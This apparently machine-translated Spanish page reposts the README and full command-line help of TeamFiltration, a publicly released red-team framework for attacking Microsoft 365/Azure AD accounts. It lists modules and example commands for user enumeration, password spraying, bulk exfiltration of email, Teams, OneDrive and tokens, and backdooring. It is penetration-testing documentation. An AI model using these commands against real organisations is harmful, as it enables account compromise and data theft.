filtro de equipo es un marco multiplataforma para enumerar, rociar, exfiltrar y hacer backdoor en cuentas O365 AAD.Ver filtro de equipo Se utiliza para presentar cómo funciona TeamFiltration y Guía de inicio rápido ¡Cómo ponerlo en marcha!
Esta herramienta se ha utilizado internamente desde enero de 2021 y se lanzó públicamente durante mi charla «Taking a Dumb In The Cloud» durante DefCON30.
Puede descargar la última versión precompilada para Linux, Windows y MacOSX X64
Estas versiones están precompiladas en un binario dependiente de la aplicación. El tamaño ha aumentado, pero no necesita DotNetCore ni ninguna otra dependencia para ejecutarlos.
[�] TeamFiltration V0.3.3.7 PUBLIC, created by @Flangvik @TrustedSec Usage: --outpath Output path to store database and exfiltrated information (Needed for all modules) --config Local path to your TeamFiltration.json configuration file, if not provided will load from the current path --exfil Load the exfiltration module --username Override to target a given username that does not exist in the database --password Override to target a given password that does not exist in the database --cookie-dump Override to target a given account using it's refresk-cookie-collection --all Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams) --aad Exfiltrate information from Graph API (domain users and groups) --teams Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist) --onedrive Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the users entire OneDrive directory) --owa Exfiltrate information from the Outlook REST API (The last 2k emails, both sent and received) --owa-limit Set the max amount of emails to exfiltrate, default is 2k. --jwt-tokens Exfiltrate JSON formated JTW-tokens for SSO resources (MsGraph,AdGraph, Outlook, SharePoint, OneDrive, Teams) --spray Load the spraying module --aad-sso Use SecureWorks recent Azure Active Directory password brute-forcing vuln for spraying --us-cloud When spraying companies attached to US Tenants ( --time-window Defines a time windows where spraying should accour, in the military time format <12:00-19:00> --passwords Path to a list of passwords, common weak-passwords will be generated if not supplied --seasons-only Password generated for spraying will only be based on seasons --months-only Password generated for spraying will only be based on months --common-only Spray with the top 20 most common passwords --combo Path to a combolist of username:password --exclude Path to a list of emails to exclude from spraying --sleep-min Minimum minutes to sleep between each full rotation of spraying default=60 --sleep-max Maximum minutes to sleep between each full rotation of spraying default=100 --delay Delay in seconds between each individual authentication attempt. default=0 --push Get Pushover notifications when valid credentials are found (requires pushover keys in config) --push-locked Get Pushover notifications when an sprayed account gets locked (requires pushover keys in config) --force Force the spraying to proceed even if there is less thetime since the last attempt --enum Load the enumeration module --domain Domain to perfom enumeration against, names pulled from statistically-likely-usernames if not provided with --usernames --usernames Path to a list of usernames to enumerate (emails) --dehashed Use the dehashed submodule in order to enumerate emails from a basedomain --validate-msol Validate that the given o365 accounts exists using the public GetCredentialType method (Very RateLimited - Slow 20 e/s) --validate-teams Validate that the given o365 accounts exists using the Teams API method (Recommended - Super Fast 300 e/s) --validate-login Validate that the given o365 accounts by attemping to login (Noisy - triggers logins - Fast 100 e/s) --backdoor Loads the interactive backdoor module --database Loads the interactive database browser module --debug Add burp as a proxy on Examples: --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00 --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --exfil --all --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --exfil --aad --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000 --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --backdoor --outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --database